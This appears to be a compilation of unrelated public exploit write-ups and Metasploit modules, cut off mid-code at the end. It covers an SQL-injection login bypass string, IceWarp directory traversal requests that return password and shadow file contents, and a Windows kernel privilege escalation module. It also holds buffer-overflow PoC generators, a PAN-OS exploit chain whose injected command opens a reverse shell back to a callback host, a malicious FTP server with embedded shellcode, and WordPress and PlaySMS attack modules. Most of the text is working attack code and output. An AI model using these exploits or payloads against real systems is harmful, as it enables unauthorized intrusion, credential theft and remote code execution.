|__| _____/ ____\___________ _____ _____ _/ |_|__| ________ __ ____
| |/ \ __\/ _ \_ __ \/ \\__ \\ __\ |/ ____/ | \_/ __ \
| | | \ | ( <_> ) | \/ Y Y \/ __ \| | | < <_| | | /\ ___/
|__|___| /__| \____/|__| |__|_| (____ /__| |__|\__ |____/ \___ >
\/ \/ \/ |__| \/
.__
______ ______________ _|__| ____ ____ ______
/ ___// __ \_ __ \ \/ / |/ ___\/ __ \ / ___/
\___ \\ ___/| | \/\ /| \ \__\ ___/ \___ \
/____ >\___ >__| \_/ |__|\___ >___ >____ >
\/ \/ \/ \/ \/
##################################################################################
SQL Injection Authentication Bypass
Product Page: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
Author(Pentester): Youssef mami (contact@hammamet-services.com)
On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( our blog )
On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info
##################################################################################
we just need to input admin login like this : admin' or ' 1=1-- and any password :-)
login : admin' or ' 1=1--
password: hammamet informatique services
Vendor: IceWarp (http://www.icewarp.com)
Product: IceWarp Mail Server
Version affected: 11.1.1 and below
Product description:
IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection.
IceWarp Mail Server is a commercial mail and groupware server developed by IceWarp Ltd. It runs on Windows and Linux.
Finding 1: Multiple Unauthenticated Directory traversal
Credit: Piotr Karolak of Trustwave's SpiderLabs
CVE: CVE-2015-1503
CWE: CWE-22
#Proof of Concept
The unauthenticated Directory Traversal vulnerability can be exploited by
issuing a specially crafted HTTP GET request to the
/webmail/client/skins/default/css/css.php. Directory Traversal is a
vulnerability which allows attackers to access restricted directories and
execute commands outside of the web server's root directory.
This vulnerability affects /-.._._.--.._1416610368(variable, depending on
the installation, need to check page
source)/webmail/client/skins/default/css/css.php.
Attack details
URL GET input file was set to ../../../../../../../../../../etc/passwd
Proof-of-Concept:
The GET or POST request might be sent to the host A.B.C.D where the IceWarp mail server is running:
REQUEST
=======
GET /-.._._.--.._1416610368/webmail/client/skins/default/css/css.php?file=../../../../../../../../../../etc/passwd&palette=default&skin=default HTTP/1.1
Referer: http://a.b.c.d/
Cookie: PHPSESSID_BASIC=wm-54abaf5b3eb4d824333000; use_cookies=1; lastLogin=en%7Cbasic; sess_suffix=basic; basic_disable_ip_check=1; lastUsername=test; language=en
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
RESPONSE:
=========
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
....TRUNCATED
test:x:1000:1000:test,,,:/home/test:/bin/bash
smmta:x:116:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:117:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
mysql:x:118:127:MySQL Server,,,:/nonexistent:/bin/false
The above proof-of-concept would retrieve the /etc/passwd file (the
response in this example has been truncated).
#Proof of Concept
The unauthenticated Directory Traversal vulnerability can be exploited by
issuing a specially crafted HTTP GET and POST request payload
..././..././..././..././..././..././..././..././..././..././etc/shadow
submitted in the script and/or style parameter. Directory Traversal is a
vulnerability which allows attackers to access restricted directories and
execute commands outside of the web server's root directory.
The script and style parameters are vulnerable to path traversal attacks,
enabling read access to arbitrary files on the server.
REQUEST 1
=========
GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
Host: a.b.c.d
Accept: */*
Accept-Language: en
Connection: close
Referer: http://a.b.c.d/webmail/old/calendar/index.html?_n[p][content]=event.main&_n[p][main]=win.main.public&_n[w]=main
Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en
REQUEST 2
=========
GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
Host: a.b.c.d
Accept: */*
Accept-Language: en
Connection: close
Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en
RESPONSE
========
HTTP/1.1 200 OK
Connection: close
Server: IceWarp/11.1.1.0
Date: Thu, 03 Jan 2015 06:44:23 GMT
Content-type: text/javascript; charset=utf-8
root:!:16436:0:99999:7:::
daemon:*:16273:0:99999:7:::
bin:*:16273:0:99999:7:::
sys:*:16273:0:99999:7:::
sync:*:16273:0:99999:7:::
games:*:16273:0:99999:7:::
man:*:16273:0:99999:7:::
lp:*:16273:0:99999:7:::
....TRUNCATED
lightdm:*:16273:0:99999:7:::
colord:*:16273:0:99999:7:::
hplip:*:16273:0:99999:7:::
pulse:*:16273:0:99999:7:::
test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7:::
smmta:*:16436:0:99999:7:::
smmsp:*:16436:0:99999:7:::
mysql:!:16436:0:99999:7:::
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/post/windows/reflective_dll_injection'
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows WMI Recieve Notification Exploit',
'Description' => %q(
This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl.
This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.
),
'License' => MSF_LICENSE,
'Author' => [
'smmrootkit', # crash code
'de7ec7ed', # exploit code
'de7ec7ed', # msf module
],
'Arch' => [ARCH_X64],
'Platform' => 'win',
'SessionTypes' => ['meterpreter'],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'Targets' => [
['Windows 7 SP0/SP1', { 'Arch' => ARCH_X64 }]
],
'Payload' => {
'Space' => 4096,
'DisableNops' => true
},
'References' => [
['CVE', '2016-0040'],
['MSB', 'MS16-014'],
['URL', 'https://github.com/de7ec7ed/CVE-2016-0040'],
['URL', 'https://github.com/Rootkitsmm/cve-2016-0040'],
['URL', 'https://technet.microsoft.com/en-us/library/security/ms16-014.aspx']
],
'DisclosureDate' => 'Dec 4 2015',
'DefaultTarget' => 0)
)
end
def check
# Windows 7 SP0/SP1 (64-bit)
if sysinfo['OS'] !~ /windows/i
return Exploit::CheckCode::Unknown
end
file_path = expand_path('%windir%') << '\\system32\\ntoskrnl.exe'
major, minor, build, revision, branch = file_version(file_path)
vprint_status("ntoskrnl.exe file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
return Exploit::CheckCode::Safe if build > 7601
return Exploit::CheckCode::Appears
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
check_result = check
if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
end
if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
end
print_status('Launching notepad to host the exploit...')
notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
begin
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
# Reader Sandbox won't allow to create a new process:
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_status('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0040', 'CVE-2016-0040.x64.dll')
library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status('Payload injected. Executing exploit...')
process.thread.create(exploit_mem + offset, payload_mem)
print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
end
end
# Exploit Title: WF Cookie Consent - Authenticated Persistent Cross-Site Scripting
# Date: 23/04/2018
# Exploit Author: B0UG
# Vendor Homepage: http://www.wunderfarm.com/
# Software Link: https://en-gb.wordpress.org/plugins/wf-cookie-consent/
# Version: Tested on version 1.1.3 (older versions may also be affected)
# Tested on: WordPress
# Category : Webapps
# CVE: CVE-2018-10371
I. VULNERABILITY
-------------------------
Authenticated Persistent Cross-Site Scripting
II. BACKGROUND
-------------------------
WF Cookie Consent is a WordPress plugin which has been designed to display cookie consent notifications on a WordPress website.
III. DESCRIPTION
-------------------------
A authenticated persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in a victim's web browser.
IV. PROOF OF CONCEPT
-------------------------
1) Access WordPress control panel.
2) Navigate to the 'Pages'.
3) Add a new page and insert the script you wish to inject into the page title.
4) Now navigate to 'Settings' and select 'WF Cookie Consent'.
5) Your injected script will now be executed.
V. IMPACT
-------------------------
An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.
VI. SYSTEMS AFFECTED
-------------------------
WordPress websites running "WF Cookie Consent" plugin version 1.1.3 (older versions may also be affected).
VII. REMEDIATION
-------------------------
Implement a web application such as Wordfence or uninstall the plugin.
VIII. DISCLOSURE TIMELINE
-------------------------
April 23, 2018 1: Vulnerability identified.
April 23, 2018 2: Informed developer of the vulnerability.
May 2, 2018 3: No reply from the developer.
# Exploit Title: DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)
# Date: 2018-05-04
# Exploit Author: Youssef mami
# Vendor Homepage: https://www.devicelock.com/freeware.html/
# Version: 5.72
# CVE : CVE-2018-10655
# Security Issue:
DeviceLock Plug and Play Auditor "DLPnpAuditor.exe" is vulnerable to a Unicode type of buffer overflow, when supplied a specially crafted textfile using the "scan network" from file option.
The buffer overload payload will get converted to unicode character encoding. Unicode support is used by applications for internationalization purposes allowing a consistent way to visually
represent different character sets on most systems around the world.
e.g.
Before our buffer overflow payload was put on the stack it was expanded with 0x00 so "RRRR" transforms to Unicode representation of "00520052"
(52 is HEX for Ascii char R) containing 0's (NULL) values. Therefore, attempting to exploit the vulnerable program needs an unicode compatiable address
(address with null bytes) and using encoding methods like "alpha2" encoder tool.
Stack dump:
SEH chain of main thread
Address SE handler
0018EE00 ntdll.771B34DD
0018FBD4 00520052
00520052 A42F0000
E5C1411F *** CORRUPT ENTRY ***
EAX 00000000
ECX 00520052
EDX 771B34DD ntdll.771B34DD
EBX 00000000
ESP 0018EDEC
EBP 0018EE0C
ESI 00000000
EDI 00000000
EIP 00520052
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
# Exploit/POC:
1) Create POC textfile
2) Under File menu "Scan Network" choose "From file" under drop down menu.
3) Choose the exploit file select the Scan "Domain" box and run it.
#Unicode SEH Buffer Overflow
#https://www.devicelock.com/download/
PAYLOAD="A"*1036+"R"*8+"B"*56 #Control SEH
file=open("devicelock-bof.txt","w")
file.write(PAYLOAD)
file.close()
print 'DeviceLock Plug and Play Auditor v5.72 (freeware)'
print 'Exploit POC file created.'
print 'hyp3rlinx'
# Disclosure Timeline:
Vendor Notification: April 17, 2018
No reply
Vendor Notification: April 22, 2018
No reply
May 6, 2018 : Public Disclosure
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Palo Alto Networks readSessionVarsFromFile() Session Corruption',
'Description' => %q{
This module exploits a chain of vulnerabilities in Palo Alto Networks products running
PAN-OS versions prior to 6.1.19, 7.0.19, 7.1.14, and 8.0.6. This chain starts by using
an authentication bypass flaw to to exploit an XML injection issue, which is then
abused to create an arbitrary directory, and finally gains root code execution by
exploiting a vulnerable cron script. This module uses an initial reverse TLS callback
to stage arbitrary payloads on the target appliance. The cron job used for the final
payload runs every 15 minutes by default and exploitation can take up to 20 minutes.
},
'Author' => [
'Philip Pettersson <philip.pettersson[at]gmail com>', # Vulnerability discovery
'hdm' # Metasploit module
],
'References' => [
['CVE', '2017-15944'],
['URL', 'http://seclists.org/fulldisclosure/2017/Dec/38'],
['BID', '102079'],
],
'DisclosureDate' => 'Dec 11 2017',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' => {'BadChars' => '', 'Space' => 8000, 'DisableNops' => true},
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {'WfsDelay' => 2}
))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptAddress.new('CBHOST', [ false, "The listener address used for staging the real payload" ]),
OptPort.new('CBPORT', [ false, "The listener port used for staging the real payload" ])
])
end
def exploit
# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])
# Start a listener
start_listener(true)
# Figure out the port we picked
cbport = self.service.getsockname[2]
# Set the base directory and the staging payload directory path name
base_directory = "/opt/pancfg/mgmt/logdb/traffic/1/"
command_payload = "* -print -exec bash -c openssl${IFS}s_client${IFS}-quiet${IFS}-connect${IFS}#{cbhost}:#{cbport}|bash ; "
target_directory = base_directory + command_payload
if target_directory.length > 255
print_error("The selected payload or options resulted in an encoded command that is too long (255+ bytes)")
return
end
dev_str_1 = Rex::Text.rand_text_alpha_lower(1+rand(10))
dev_str_2 = Rex::Text.rand_text_alpha_lower(1+rand(10))
user_id = rand(2000).to_s
print_status("Creating our corrupted session ID...")
# Obtain a session cookie linked to a corrupted session file. A raw request
# is needed to prevent encoding of the parameters injected into the session
res = send_request_raw(
'method' => 'GET',
'uri' => "/esp/cms_changeDeviceContext.esp?device=#{dev_str_1}:#{dev_str_2}%27\";user|s.\"#{user_id}\";"
)
unless res && res.body.to_s.index('@start@Success@end@')
print_error("Unexpected response when creating the corrupted session cookie: #{res.code} #{res.message}")
return
end
cookies = res.get_cookies
unless cookies =~ /PHPSESSID=([a-fA-F0-9]+)/
print_error("Unexpected cookie response when creating the corrupted session cookie: #{res.code} #{res.message} #{cookies}")
return
end
create_directory_tid = 1 + rand(1000)
create_directory_json = JSON.dump({
"action" => "PanDirect",
"method" => "execute",
"data" => [
Rex::Text.md5(create_directory_tid.to_s),
"Administrator.get",
{
"changeMyPassword" => true,
"template" => Rex::Text.rand_text_alpha_lower(rand(9) + 3),
"id" => "admin']\" async-mode='yes' refresh='yes' cookie='../../../../../..#{target_directory}'/>\x00"
}
],
"type" => "rpc",
"tid" => create_directory_tid
})
print_status("Calling Administrator.get to create directory under #{base_directory}...")
res = send_request_cgi(
'method' => 'POST',
'uri' => '/php/utils/router.php/Administrator.get',
'cookie' => cookies,
'ctype' => "application/json",
'data' => create_directory_json
)
unless res && res.body.to_s.index('Async request enqueued')
print_error("Unexpected response when calling Administrator.get method: #{res.code} #{res.message}")
return
end
register_dirs_for_cleanup(base_directory)
print_status("Waiting up to 20 minutes for the cronjob to fire and execute...")
expiry = Time.at(Time.now.to_i + (60*20)).to_i
last_notice = 0
while expiry > Time.now.to_i && ! session_created?
if last_notice + 30 < Time.now.to_i
print_status("Waiting for a session, #{expiry - Time.now.to_i} seconds left...")
last_notice = Time.now.to_i
end
sleep(1)
end
unless session_created?
print_error("No connection received from the target, giving up.")
end
end
def stage_real_payload(cli)
print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
cli.put(payload.encoded + "\n")
end
def start_listener(ssl = false)
comm = datastore['ListenerComm']
if comm == "local"
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
self.service = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['CBPORT'],
'SSL' => true,
'SSLCert' => datastore['SSLCert'],
'Comm' => comm,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
self.service.on_client_connect_proc = Proc.new { |client|
stage_real_payload(client)
}
# Start the listening service
self.service.start
end
def cleanup
super
if self.service
print_status("Shutting down payload stager listener...")
begin
self.service.deref if self.service.kind_of?(Rex::Service)
if self.service.kind_of?(Rex::Socket)
self.service.close
self.service.stop
end
self.service = nil
rescue ::SocketError
end
end
end
# Accessor for our TCP payload stager
attr_accessor :service
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress User Role Editor Plugin Privilege Escalation',
'Description' => %q{
The WordPress User Role Editor plugin prior to v4.25, is lacking an authorization
check within its update user profile functionality ("update" function, contained
within the "class-user-other-roles.php" module).
Instead of verifying whether the current user has the right to edit other users'
profiles ("edit_users" WP capability), the vulnerable function verifies whether the
current user has the rights to edit the user ("edit_user" WP function) specified by
the supplied user id ("user_id" variable/HTTP POST parameter). Since the supplied
user id is the current user's id, this check is always bypassed (i.e. the current
user is always allowed to modify its profile).
This vulnerability allows an authenticated user to add arbitrary User Role Editor
roles to its profile, by specifying them via the "ure_other_roles" parameter within
the HTTP POST request to the "profile.php" module (issued when "Update Profile" is
clicked).
By default, this module grants the specified WP user all administrative privileges,
existing within the context of the User Role Editor plugin.
},
'Author' =>
[
'ethicalhack3r', # Vulnerability discovery
'Tomislav Paskalev' # Exploit development, metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['WPVDB', '8432'],
['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/']
],
'DisclosureDate' => 'Apr 05 2016',
))
register_options(
[
OptString.new('TARGETURI', [true, 'URI path to WordPress', '/']),
OptString.new('ADMINPATH', [true, 'wp-admin directory', 'wp-admin/']),
OptString.new('CONTENTPATH', [true, 'wp-content directory', 'wp-content/']),
OptString.new('PLUGINSPATH', [true, 'wp plugins directory', 'plugins/']),
OptString.new('PLUGINPATH', [true, 'User Role Editor directory', 'user-role-editor/']),
OptString.new('USERNAME', [true, 'WordPress username']),
OptString.new('PASSWORD', [true, 'WordPress password']),
OptString.new('PRIVILEGES', [true, 'Desired User Role Editor privileges', 'activate_plugins,delete_others_pages,delete_others_posts,delete_pages,delete_posts,delete_private_pages,delete_private_posts,delete_published_pages,delete_published_posts,edit_dashboard,edit_others_pages,edit_others_posts,edit_pages,edit_posts,edit_private_pages,edit_private_posts,edit_published_pages,edit_published_posts,edit_theme_options,export,import,list_users,manage_categories,manage_links,manage_options,moderate_comments,promote_users,publish_pages,publish_posts,read_private_pages,read_private_posts,read,remove_users,switch_themes,upload_files,customize,delete_site,create_users,delete_plugins,delete_themes,delete_users,edit_plugins,edit_themes,edit_users,install_plugins,install_themes,unfiltered_html,unfiltered_upload,update_core,update_plugins,update_themes,ure_create_capabilities,ure_create_roles,ure_delete_capabilities,ure_delete_roles,ure_edit_roles,ure_manage_options,ure_reset_roles'])
])
end
# Detect the vulnerable plugin by enumerating its readme.txt file
def check
readmes = ['readme.txt', 'Readme.txt', 'README.txt']
res = nil
readmes.each do |readme_name|
readme_url = normalize_uri(target_uri.path, datastore['CONTENTPATH'], datastore['PLUGINSPATH'], datastore['PLUGINPATH'], readme_name)
vprint_status("Checking #{readme_url}")
res = send_request_cgi(
'uri' => readme_url,
'method' => 'GET'
)
break if res && res.code == 200
end
if res.nil? || res.code != 200
# The readme.txt file does not exist
return Msf::Exploit::CheckCode::Unknown
end
version_res = extract_and_check_version(res.body.to_s, :readme, 'plugin', '4.25', nil)
return version_res
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
# Search for specified data within the provided HTTP response
def check_response(res, name, regex)
res.body =~ regex
result = $1
if result
print_good("#{peer} - WordPress - Getting data - #{name}")
else
vprint_error("#{peer} #{res.body}")
fail_with("#{peer} - WordPress - Getting data - Failed (#{name})")
end
return result
end
# Run the exploit
def run
# Check if the specified target is running WordPress
fail_with("#{peer} - WordPress - Not Found") unless wordpress_and_online?
# Authenticate to WordPress
print_status("#{peer} - WordPress - Authentication - #{username}:#{password}")
cookie = wordpress_login(username, password)
fail_with("#{peer} - WordPress - Authentication - Failed") if cookie.nil?
store_valid_credential(user: username, private: password, proof: cookie)
print_good("#{peer} - WordPress - Authentication - OK")
# Get additional information from WordPress, required for the HTTP POST request (anti-CSRF tokens, user parameters)
url = normalize_uri(wordpress_url_backend, 'profile.php')
print_status("#{peer} - WordPress - Getting data - #{url}")
res = send_request_cgi({
'method' => 'GET',
'uri' => url,
'cookie' => cookie
})
if res and res.code == 200
wp_nonce = check_response(res, "_wpnonce", /name=\"_wpnonce\" value=\"(.+?(?=\"))\"/)
color_nonce = check_response(res, "color-nonce", /name=\"color-nonce\" value=\"(.+?(?=\"))\"/)
checkuser_id = check_response(res, "checkuser_id", /name=\"checkuser_id\" value=\"(.+?(?=\"))\"/)
nickname = check_response(res, "nickname", /name=\"nickname\" id=\"nickname\" value=\"(.+?(?=\"))\"/)
display_name = check_response(res, "display_name", /name=\"display_name\" id=\"display_name\"\>[\s]+\<option selected=\'selected\'\>(.+?(?=\<))\</)
email = check_response(res, "email", /name=\"email\" id=\"email\" value=\"(.+?(?=\"))\"/)
user_id = check_response(res, "user_id", /name=\"user_id\" id=\"user_id\" value=\"(.+?(?=\"))\"/)
else
fail_with("#{peer} - WordPress - Getting data - Server response (code #{res.code})")
end
# Send HTTP POST request - update the specified user's privileges
print_status("#{peer} - WordPress - Changing privs - #{username}")
res = send_request_cgi({
'method' => 'POST',
'uri' => url,
'vars_post' => {
'_wpnonce' => wp_nonce,
'_wp_http_referer' => URI::encode(url),
'from' => 'profile',
'checkuser_id' => checkuser_id,
'color-nonce' => color_nonce,
'admin_color' => 'fresh',
'admin_bar_front' => '1',
'first_name' => '',
'last_name' => '',
'nickname' => nickname,
'display_name' => display_name,
'email' => email,
'url' => '',
'description' => '',
'pass1' => '',
'pass2' => '',
'ure_other_roles' => datastore['PRIVILEGES'],
'action' => 'update',
'user_id' => user_id,
'submit' => 'Update+Profile'
},
'cookie' => cookie
})
# check outcome
if res and res.code == 302
print_good("#{peer} - WordPress - Changing privs - OK")
else
fail_with("#{peer} - WordPress - Changing privs - Server response (code #{res.code})")
end
end
end
# EoF
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: HWiNFO 5.82-3410 - Denial of Service
# Date: 05-04-18
# Vulnerable Software: HWiNFO 5.82-3410
# Vendor Homepage: https://www.hwinfo.com/
# Version: 5.82-3410
# Software Link: https://www.hwinfo.com/files/hwi_582.exe
# Tested On: Windows 7 x86
#
# PoC:
# 1. generate hwinfo.txt, copy contents to clipboard
# 2. open app, select Report, Create
# 3. choose Export format XML
# 4. paste hwinfo.txt contents into filename field
# 5. select Next, Next
#
# app crashes & EIP overwrite;
# !mona seh > only ppr, non-safeseh module contains startnull
# 0x00400000 | 0x00d8b000 | 0x0098b000 | 5.82-3410 [HWiNFO32.EXE] (C:\Program Files\HWiNFO32\HWiNFO32.EXE)
#
filename="hwinfo.txt"
#offset 530
junk = "A"*526
seh = "B"*4
nseh = "C"*4
fill = "D"*9465
buffer = junk + seh + nseh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# -*- coding: utf-8 -*-
# Exploit Title: FTPShell Client 6.7 - Remote Buffer Overflow
# Date: 2018-01-03
# Exploit Author: Sebastián Castro @r4wd3r
# Vendor Homepage: http://www.ftpshell.com/index.htm
# Software Link: http://www.ftpshell.com/download.htm
# Version: 6.7
# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows XP SP3 x86.
# CVE : CVE-2018-7573
import socket
import sys
port = 21
# msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00\x22\x0d\x0a'
buf = ""
buf += "\xdb\xc8\xba\x3e\x93\x15\x8f\xd9\x74\x24\xf4\x5e\x33"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xc6\x3a\x71"
buf += "\xe0\x73\xaa\xf7\x0b\x8c\x2a\x98\x82\x69\x1b\x98\xf1"
buf += "\xfa\x0b\x28\x71\xae\xa7\xc3\xd7\x5b\x3c\xa1\xff\x6c"
buf += "\xf5\x0c\x26\x42\x06\x3c\x1a\xc5\x84\x3f\x4f\x25\xb5"
buf += "\x8f\x82\x24\xf2\xf2\x6f\x74\xab\x79\xdd\x69\xd8\x34"
buf += "\xde\x02\x92\xd9\x66\xf6\x62\xdb\x47\xa9\xf9\x82\x47"
buf += "\x4b\x2e\xbf\xc1\x53\x33\xfa\x98\xe8\x87\x70\x1b\x39"
buf += "\xd6\x79\xb0\x04\xd7\x8b\xc8\x41\xdf\x73\xbf\xbb\x1c"
buf += "\x09\xb8\x7f\x5f\xd5\x4d\x64\xc7\x9e\xf6\x40\xf6\x73"
buf += "\x60\x02\xf4\x38\xe6\x4c\x18\xbe\x2b\xe7\x24\x4b\xca"
buf += "\x28\xad\x0f\xe9\xec\xf6\xd4\x90\xb5\x52\xba\xad\xa6"
buf += "\x3d\x63\x08\xac\xd3\x70\x21\xef\xb9\x87\xb7\x95\x8f"
buf += "\x88\xc7\x95\xbf\xe0\xf6\x1e\x50\x76\x07\xf5\x15\x88"
buf += "\x4d\x54\x3f\x01\x08\x0c\x02\x4c\xab\xfa\x40\x69\x28"
buf += "\x0f\x38\x8e\x30\x7a\x3d\xca\xf6\x96\x4f\x43\x93\x98"
buf += "\xfc\x64\xb6\xfa\x63\xf7\x5a\xd3\x06\x7f\xf8\x2b"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", port))
s.listen(5)
print("[+] FTP server started on port: "+str(port)+"\r\n")
except:
print("[x] Failed to start the server on port: "+str(port)+"\r\n")
eip = "\xed\x2e\x45" # CALL ESI from FTPShell.exe : 0x00452eed
nops = "\x90"*40
junk = "F"*(400 - len(nops) - len(buf))
payload = nops + buf + junk + eip
while True:
conn, addr = s.accept()
conn.send('220 FTP Server\r\n')
print(conn.recv(1024))
conn.send("331 OK\r\n")
print(conn.recv(1024))
conn.send('230 OK\r\n')
print(conn.recv(1024))
conn.send('220 "'+payload+'" is current directory\r\n')
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'PlaySMS import.php Authenticated CSV File Upload Code Execution',
'Description' => %q{
This module exploits an authenticated file upload remote code excution vulnerability
in PlaySMS Version 1.4. This issue is caused by improper file contents handling in
import.php (aka the Phonebook import feature). Authenticated Users can upload a CSV
file containing a malicious payload via vectors involving the User-Agent HTTP header
and PHP code in the User-Agent.
This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.
},
'Author' =>
[
'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>' # Discoverys and Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE','2017-9101'],
['URL','https://www.youtube.com/watch?v=KIB9sKQdEwE'],
['EDB','42044']
],
'DefaultOptions' =>
{
'SSL' => false,
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'ENCODER' => 'php/base64',
},
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'PlaySMS 1.4', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 21 2017'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base playsms directory path", '/']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin'])
])
end
def uri
return target_uri.path
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php')
})
rescue
